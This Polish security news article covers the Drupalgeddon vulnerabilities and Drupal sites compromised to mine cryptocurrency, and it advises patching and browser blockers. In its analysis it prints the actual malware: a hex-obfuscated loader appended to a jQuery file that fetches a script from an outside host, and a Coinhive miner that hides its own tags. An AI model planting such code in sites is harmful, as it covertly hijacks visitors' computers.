Są już efekty Drupalgeddonu: Niezaktualizowane polskie strony kopią kryptowalutę

Czy w ostatnim miesiącu zauważyliście, że wasze strony internetowe napędzane Drupalem pobierają więcej zasobów serwera niż zwykle? A czy wdrożyliście najnowsze łatki bezpieczeństwa oznaczone przez Drupal Security Team jako krytyczne? Jedno z drugim jest bezpośrednio powiązane, więc nie ma na co czekać — po opublikowanym proof of concept ataku na niezaktualizowane strony Drupala ich zhackowanie / przejęcie jest proste jak nigdy przedtem. Jeżeli ta sztuka powiedzie się atakującemu, to będzie mógł podłożyć plik JavaScript odwołujący się do koparki kryptowaluty. W efekcie firma traci na wizerunku w oczach klientów a napastnik będzie mógł wydobywać wirtualną walutę na komputerach czytelników serwisu.

Drupalgeddon

Drupalgeddon1, Drupalgeddon2 i Drupalgeddon3

Za drupalową apokalipsą oznaczoną mianem Drupalgeddonem kryje się powaga zagrożenia, która opisuje trywialne wykonanie kodu na serwerze lub przejęcie strony internetowej. To incydenty o dużym zagrożeniu, ponieważ atak możliwy jest do przeprowadzenia na wielu instancjach Drupala.

Pierwszy Drupalgeddon (luka CVE-2014-3704) wydarzył się w 2014 roku i według kalkulatora ryzyka stosowanego przez Drupal Security Team otrzymał maksymalny wynik 25/25 pkt na skali powagi zagrożenia. Wtedy problem dotyczył wysłania przez anonimowego użytkownika (bez specjalnych uprawnień) spreparowanego żądania powodującego wykonanie dowolnego kodu SQL. W zależności od komendy mogło to skutkować np. eskalacją uprawnień lub wykonaniem kodu PHP.

Na drugi Drupalgeddon czekaliśmy 4 lata do 28 marca 2018 roku. Szybko udostępniona aktualizacja naprawiała lukę CVE-2018-7600, która pozwalała atakującemu uruchomić dowolny kod na serwerze bez specjalnych uprawnień — atakujący w domyślnej instalacji nie musiał się uwierzytelniać. Luka została określona przez zespół od bezpieczeństwa Drupala jako wysoce krytyczna ze skalą 24/25 punktów. Warto tu dodać, że strony schowane za DNS-ami CloudFlare były bezpieczne.

Do trzeciego Drupalgeddonu doszło 25 kwietnia 2018 roku. Podatność CVE-2018-7602 była już znacznie trudniejsza do wykorzystania, ponieważ wymagała uwierzytelnienia. Co wcale nie przeszkodziło napastnikom, którzy korzystając z opublikowanego przykładowego exploita (dostępnego także w bazie Exploit Database), dokonywać ataków — jak to się określa — in the wild.

Wymieniona strona z bazą exploitów zawiera gotowe zestawy poleceń do zdalnego wykonania kodu na niezaktualizowanych stronach napędzanych Drupalem. Atak jest bardzo łatwy do przeprowadzenia. Szczegóły dostępne są na GitHubie.

Nie ma na co czekać. Aktualizacja jest absolutnie konieczna.

Ofiary Drupalgeddonu w Polsce i na świecie

Troy Mursch opublikował statystyki, które udało mu się do tej pory zebrać. Wśród skompromitowanych 384 stron najwięcej znajduje się w USA, Francji i Kanadzie. Na tej liście widzimy dwie domeny TLD .PL należące do polskich firm (szybka.pl i vaks.pl), z którymi skontaktowaliśmy się i ostrzegliśmy właścicieli. Chociaż plik wskazuje tylko na dwie firmy z Polski, to wcale nie oznacza, że badaczowi udało dotrzeć do wszystkich stron internetowych na świecie napędzanych Drupalem. Trudno oszacować skalę, ale zainfekowanych polskich domen z pewnością jest więcej.

Doklejony kod do strony można rozpoznać po pliku „/misc/jquery.once.js?v=1.2”, który na końcu zawiera zaszyfrowane odwoływanie się do skryptu na stronie hxxp://vuuwd.com/t.js <- ten już nie jest zaszyfrowany:

var RqLm1=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0];var D2=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74');D2["\x74\x79\x70\x65"]='\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74';D2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';D2["\x73\x72\x63"]='\x68\x74\x74\x70\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';RqLm1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](D2);

Zawartość hxxp://vuuwd.com/t.js:

function loadScript(url, callback) {
    var script = document.createElement("script");
    script.type = "text/javascript";
    script.id = "m_g_a_j_s_";
    if (script.readyState) {
        script.onreadystatechange = function () {
            if (script.readyState == "loaded" || script.readyState == "complete") {
                script.onreadystatechange = null;
                callback();
            }
        };
    } else { // others
        script.onload = function () {
            callback();
        };
    }
    script.src = url;
    document.body.appendChild(script);
}
loadScript("https://coinhive.com/lib/coinhive.min.js", function () {
        var miner = new CoinHive.Anonymous('KNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6', {throttle: 0.2});
        miner.start();
        var s = document.getElementById('m_g_a');
        var p = s.parentElement;
        p.removeChild(s);
        var s1 = document.getElementById('m_g_a_j_s_');
        var p1 = s1.parentElement;
        p1.removeChild(s1);
});

Wśród ofiar znajdują się amerykańskie i tureckie strony rządowe, uniwersytety, strona internetowa Lenovo, dwie strony z końcówką .pl i wiele innych.

Niezaktualizowane strony tak kończą.

Niezaktualizowane strony są niebezpieczne dla internautów

Nie jest możliwe, aby ręcznie weryfikować bezpieczeństwo każdej odwiedzanej witryny w sieci. Czytelnikom rekomendujemy zainstalowanie blokera reklam uBlock Origin, który zawiera wbudowane czarne listy koparek kryptowalut. To powinno wystarczyć, aby blokować skrypty wykorzystujące moc procesora. Osobom, które nie chcą lub nie korzystają z blokera reklam uBlock Origin, polecamy plugin NoCoin dla Firefoxa, Opery i Chrome.

Internauci, którzy mają już zainstalowane antywirusy, ale niekoniecznie z ochroną na poziomie przeglądarki, powinni doinstalować skaner internetowy Bitdefender TrafficLight lub Avira Browser Safe.



Dodaj komentarz

Treść tego pola jest prywatna i nie będzie udostępniana publicznie.

Zapoznaj się z naszą ofertą

Jeśli zajmujesz się sprzedażą rozwiązań zabezpieczających, jesteś dystrybutorem, autoryzowanym partnerem lub producentem i chciałbyś na portalu AVLab zaprezentować swoje portfolio gronu potencjalnych odbiorców, zareklamować wydarzenie, oprogramowanie, sprzęt lub inne usługi — po prostu napisz do nas. A może mialeś/aś do czynienia z ransomware? Pomagamy też w odszyfrowaniu plików.
Czytaj więcej